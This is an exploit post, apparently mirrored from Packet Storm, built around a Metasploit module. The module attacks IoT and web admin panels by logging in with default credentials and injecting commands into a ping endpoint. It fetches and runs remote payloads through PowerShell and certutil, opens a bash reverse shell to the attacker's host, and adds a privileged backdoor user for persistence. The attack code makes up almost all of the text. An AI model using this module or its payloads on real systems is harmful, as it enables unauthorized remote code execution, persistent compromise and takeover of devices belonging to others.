Share
## https://sploitus.com/exploit?id=PACKETSTORM:213315
=============================================================================================================================================
    | # Title     : Netbus Backdoor 1.7 From Legacy to Modern IoT Risks Full RCE Threat                                                         |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
    | # Vendor    : System built‑in component. No standalone download available                                                                 |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/213263/ & MVID-2025-0703
    
    [+] Summary    : This document traces the evolution of a Metasploit module concept from an initial theoretical/historical analysis of the 1998 NetBus backdoor to a practical, 
                     modern exploit module targeting insecure credential storage vulnerabilities. 
    				 The journey highlights critical distinctions between academic research modules and production-ready exploits.
    
    [+] Evolution of Exploitation Techniques :
    
    1998 NetBus Model
        ↓
    Core Vulnerability: Insecure Credential Storage
        ↓
    Modern Manifestations:
    
    β€’ IoT devices with default passwords
    β€’ Web admin panels with hardcoded credentials  
    β€’ Industrial control systems with backdoor accounts
        ↓
    Modern Exploitation Methods:
    
    β€’ Authentication bypass β†’ Command injection
    β€’ File upload β†’ Remote code execution
    β€’ Privilege escalation β†’ Persistent access
    
    [+] POC :
    
    ##
    # This module exploits the "Insecure Credential Storage" vulnerability in modern systems
    # Similar to the NetBus principle but in modern web applications
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking
    
      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::CmdStager
    
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'IoT Device Backdoor Credential RCE',
          'Description'    => %q{
            This module exploits two common vulnerabilities in IoT devices and embedded systems:
            1. Insecure credential storage (default/static passwords)
            2. Command injection via system management interface
    
            The module simulates a realistic scenario similar to NetBus but in a modern context.
          },
          'Author'         => [
            'indoushka',
            'Based on NetBus research by John Page (hyp3rlinx)'
          ],
          'License'        => MSF_LICENSE,
          'References'     => [
            ['URL', 'https://owasp.org/www-community/vulnerabilities/Use_of_hard-coded_password'],
            ['CWE', '798'],  # Use of Hard-coded Credentials
            ['CWE', '78'],   # OS Command Injection
            ['TTP', 'T1078'], # Valid Accounts
            ['TTP', 'T1059']  # Command and Scripting Interpreter
          ],
          'Platform'       => ['linux', 'unix', 'win'],
          'Arch'           => [ARCH_X86, ARCH_X64, ARCH_ARMLE],
          'Targets'        => [
            ['Linux (x86/x64)', { 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64] }],
            ['Linux (ARM)',    { 'Platform' => 'linux', 'Arch' => ARCH_ARMLE }],
            ['Windows',        { 'Platform' => 'win',   'Arch' => [ARCH_X86, ARCH_X64] }]
          ],
          'Privileged'     => true,
          'DisclosureDate' => '2023-01-01',
          'DefaultTarget'  => 0
        ))
    
        register_options([
          OptString.new('TARGETURI', [true, 'Base path to the vulnerable endpoint', '/']),
          OptString.new('USERNAME', [true, 'Default/backdoor username', 'admin']),
          OptString.new('PASSWORD', [true, 'Default/backdoor password', 'admin']),
          OptString.new('BACKDOOR_USER', [false, 'Username to add for persistence', 'backdoor']),
          OptString.new('BACKDOOR_PASS', [false, 'Password for the new user', 'P@ssw0rd123!'])
        ])
      end
    
      def check
        # Step 1: Check for default credentials
        print_status("Checking for default credentials...")
        
        res = send_login_request
        
        if res && res.code == 200 && res.body.include?('success')
          return Exploit::CheckCode::Vulnerable
        elsif res && res.code == 401
          return Exploit::CheckCode::Safe
        end
        
        Exploit::CheckCode::Unknown
      end
    
      def exploit
        print_status("Attempting to exploit insecure credential storage...")
        
        # 1. Authenticate using insecure credentials
        unless authenticate
          fail_with(Failure::NoAccess, 'Authentication failed')
        end
        
        print_good("Successfully authenticated with default credentials!")
        
        # 2. Use appropriate execution method based on target system
        case target['Platform']
        when 'linux'
          exploit_linux
        when 'win'
          exploit_windows
        else
          exploit_generic
        end
      end
    
      private
    
      def send_login_request
        send_request_cgi({
          'method'   => 'POST',
          'uri'      => normalize_uri(target_uri.path, 'login.php'),
          'vars_post' => {
            'username' => datastore['USERNAME'],
            'password' => datastore['PASSWORD']
          },
          'headers'  => {
            'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1)'
          }
        })
      end
    
      def authenticate
        print_status("Authenticating as #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
        
        res = send_login_request
        
        if res && res.code == 200
          # Check for authentication success in response
          if res.body.include?('success') || res.body.include?('dashboard') || res.get_cookies.include?('session')
            @auth_cookies = res.get_cookies
            return true
          end
        end
        
        false
      end
    
      def exploit_linux
        print_status("Target is Linux, using command injection...")
        
        # Method 1: Direct Command Injection
        if try_command_injection
          return
        end
        
        # Method 2: Command Stager (to upload and execute payload)
        print_status("Attempting command stager delivery...")
        
        execute_cmdstager(
          flavor: :curl,
          delay: 0.5
        )
      end
    
      def exploit_windows
        print_status("Target is Windows, using PowerShell/Command Prompt...")
        
        # 1. Try PowerShell
        powershell_cmd = "powershell -c \"IEX(New-Object Net.WebClient).DownloadString('http://#{datastore['LHOST']}:#{datastore['SRVPORT']}/shell.ps1')\""
        
        if execute_command(powershell_cmd)
          return
        end
        
        # 2. Try CertUtil (common alternative in Windows)
        certutil_cmd = "certutil -urlcache -f http://#{datastore['LHOST']}:#{datastore['SRVPORT']}/payload.exe C:\\Windows\\Temp\\payload.exe && C:\\Windows\\Temp\\payload.exe"
        
        execute_command(certutil_cmd)
      end
    
      def exploit_generic
        print_status("Using generic exploitation method...")
        
        # Direct command execution to return Shell
        cmd = "bash -c 'bash -i >& /dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} 0>&1'"
        
        execute_command(cmd)
      end
    
      def try_command_injection
        print_status("Testing for command injection...")
        
        test_cmds = [
          '; id;', 
          '| id |',
          '`id`',
          '$(id)',
          '|| id ||'
        ]
        
        test_cmds.each do |injector|
          cmd = "ping #{injector}"
          if execute_command(cmd, check_pattern: 'uid=')
            return true
          end
        end
        
        false
      end
    
      def execute_command(cmd, opts = {})
        uri = normalize_uri(target_uri.path, 'admin', 'ping.php')
        
        # Inject command into parameter
        payload = {
          'host' => "127.0.0.1 #{cmd}",
          'count' => '1'
        }
        
        res = send_request_cgi({
          'method'    => 'POST',
          'uri'       => uri,
          'cookie'    => @auth_cookies,
          'vars_post' => payload,
          'timeout'   => 5
        })
        
        if opts[:check_pattern] && res && res.body.include?(opts[:check_pattern])
          print_good("Command injection successful!")
          print_line("Output: #{res.body}")
          return true
        end
        
        false
      rescue ::Exception => e
        print_error("Error executing command: #{e.message}")
        false
      end
    
      # Add user for persistence (Backdoor)
      def add_backdoor_user
        return unless datastore['BACKDOOR_USER'] && datastore['BACKDOOR_PASS']
        
        print_status("Adding backdoor user #{datastore['BACKDOOR_USER']}...")
        
        case target['Platform']
        when 'linux'
          cmds = [
            "useradd -m -s /bin/bash #{datastore['BACKDOOR_USER']}",
            "echo '#{datastore['BACKDOOR_USER']}:#{datastore['BACKDOOR_PASS']}' | chpasswd",
            "usermod -aG sudo #{datastore['BACKDOOR_USER']} 2>/dev/null || usermod -aG wheel #{datastore['BACKDOOR_USER']} 2>/dev/null"
          ]
          
        when 'win'
          cmds = [
            "net user #{datastore['BACKDOOR_USER']} #{datastore['BACKDOOR_PASS']} /add",
            "net localgroup administrators #{datastore['BACKDOOR_USER']} /add"
          ]
        end
        
        cmds.each { |cmd| execute_command(cmd) }
        
        print_good("Backdoor user added successfully!")
      end
    
      def on_new_session(client)
        super
        
        # After obtaining session, add backdoor user
        add_backdoor_user if client.type == 'meterpreter' || client.type == 'shell'
        
        # User tips
        print_good("Tips for post-exploitation:")
        print_line("1. Check system info: cat /etc/os-release || systeminfo")
        print_line("2. Look for interesting files: find / -type f -name '*.txt' -o -name '*.conf' 2>/dev/null")
        print_line("3. Check network connections: netstat -antup || ss -tunap")
        
        if datastore['BACKDOOR_USER']
          print_line("4. Backdoor credentials: #{datastore['BACKDOOR_USER']} / #{datastore['BACKDOOR_PASS']}")
        end
      end
    end
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================